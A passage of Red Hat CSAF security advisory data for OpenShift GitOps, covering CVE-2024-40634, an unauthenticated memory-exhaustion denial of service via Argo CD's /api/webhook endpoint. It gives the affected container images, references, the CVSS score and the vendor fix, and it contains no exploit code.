{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-40634"
},
{
"category": "external",
"summary": "RHBZ#2299473",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299473"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-40634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40634"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
}
],
"release_date": "2024-07-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-08-01T11:04:17+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4973"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:bdfbf535f858e2c2e1abb74c2d513bf5f970d105f7d7b9678adb4702934056db_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/argo-rollouts-rhel8@sha256:cb95a31e6445ba30f6189fd8ff2ef6f75b37d7d5835ca168b0a4ea6f03678b1f_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:b2596687f550a204e1c0994583406f857faa1917a1e41561d6b154071c3ed63e_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/argocd-rhel8@sha256:e4859aef6c26fbadaa45f4e37813977208f490f6f1c047621591ad6be30577b3_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:5fe4ade2ee712defbdd1e0b64af88b62ed7c9bd95ee896e1a9de5ac528320e19_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:ba1ed27f053c5cbb54febfa8b03a038250c557586c501e09abe6906592cdcd19_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:67837763574902fd1c6ac1bff6bd7efe6e1fab7049389ae69bc21f50d810397c_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:d002617194b11ad14c836a5367ca0198be802c40d8e86b54f188f80fbdf70ff1_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-operator-bundle@sha256:47798cd9f0498560eab4efede77f144b937b07ddb77e3831b654f51d1a5b04b6_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:81bc146c5dfbacde091a03ed12d04b61bc33258d44203798e332efb0ee5c27f9_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:9164b66f491acb3f5ad79a44b1a0d342644bc3c860e98fd2034aa7676b897024_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:edfa5765e92902d63473e1921d4814a007db7bf7242a11b929b1550954ea1dde_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:75cbc8b5e4b25ded63ad9dfec0e1acaca8f0779c85c8e28b489ba2292d176c2b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/gitops-rhel8@sha256:eb2ad7951c4e0125fb803d681f42f6e8a4d0ce03e1be9567f3aeb9d131c3ed5b_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:1e17fb78bcf6d4799b02e514527010cf267502d982c2f6e7ce92309e9d0cf550_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/kam-delivery-rhel8@sha256:fd3214d586fd54846577a57285378b87cade3575911d6040701aee903a53800a_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:103da26a12b0f6408da3a16b93a4051ae3c2bd68c5c23398ab09d6a3bc33cb3b_ppc64le",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:423090fd4a5d3f096c61c0445c005da53095dff0154b9ad680c3749b7ef6e4dd_arm64",
"8Base-GitOps-1.12:openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:233b230e32fb38dfddc32ef3046568d80816031c9a6fcff8393448ba452d4f50_arm64",
"9Base-GitOps-1.12:openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD"
}
]
}
RHSA-2024:4891
Vulnerability from csaf_redhat - Published: 2024-07-26 20:58 - Updated: 2026-03-18 16:23A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
| URL | Category | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat OpenShift GitOps v1.13.1. Red Hat\nProduct Security has rated this update as having a security impact of Important.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Errata Advisory for Red Hat OpenShift GitOps v1.13.1.\n\nSecurity Fix(es):\n\n* openshift-gitops-argocd-container: Unauthenticated Denial of Service Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.13](CVE-2024-40634)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* In argoCD Version 2.11.3 webhook api endpoint is not working for Bitbucket and Azure DevOps",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4891",
"url": "https://access.redhat.com/errata/RHSA-2024:4891"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "GITOPS-5045",
"url": "https://issues.redhat.com/browse/GITOPS-5045"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4891.json"
}
],
"title": "Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.13.1 security update",
"tracking": {
"current_release_date": "2026-03-18T16:23:49+00:00",
"generator": {
"date": "2026-03-18T16:23:49+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.3"
}
},
"id": "RHSA-2024:4891",
"initial_release_date": "2024-07-26T20:58:31+00:00",
"revision_history": [
{
"date": "2024-07-26T20:58:31+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-07-26T20:58:31+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-03-18T16:23:49+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.13",
"product": {
"name": "Red Hat OpenShift GitOps 1.13",
"product_id": "8Base-GitOps-1.13",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.13::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.13",
"product": {
"name": "Red Hat OpenShift GitOps 1.13",
"product_id": "9Base-GitOps-1.13",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.13::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:8738e84b087318aa8b9a3d2fa851e018897af0b646de58cde3be0861c3a2b3fd?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:7a90a484902bfc7148217914cd65f0a1d7e79218a238abc479a6d9ccef96f4cf?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:f241386d6775eda56cc4965fc798b3c955c8ad37fbab5c0b9d2a047322df3c8c?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:4b1708affdaeb5e9916da886b1fe9819e2ff05950e462ce34222a426e66a581e?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:7b5b7193324c2bf732cb5680b08344d80c6fc36f0994c7f672e8a494e02c5af6?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:fe61e21f90bdfa11451947a3f4ab59adc0e9056414ffdfdfedf7ad79a94c617a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:ed9f5f7d1db149ff01c4d545728008ee9c0eee77b1f5feede99b68ba8b56c0fa?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.13.1-6"
}
}
},
{
"category": "product_version",
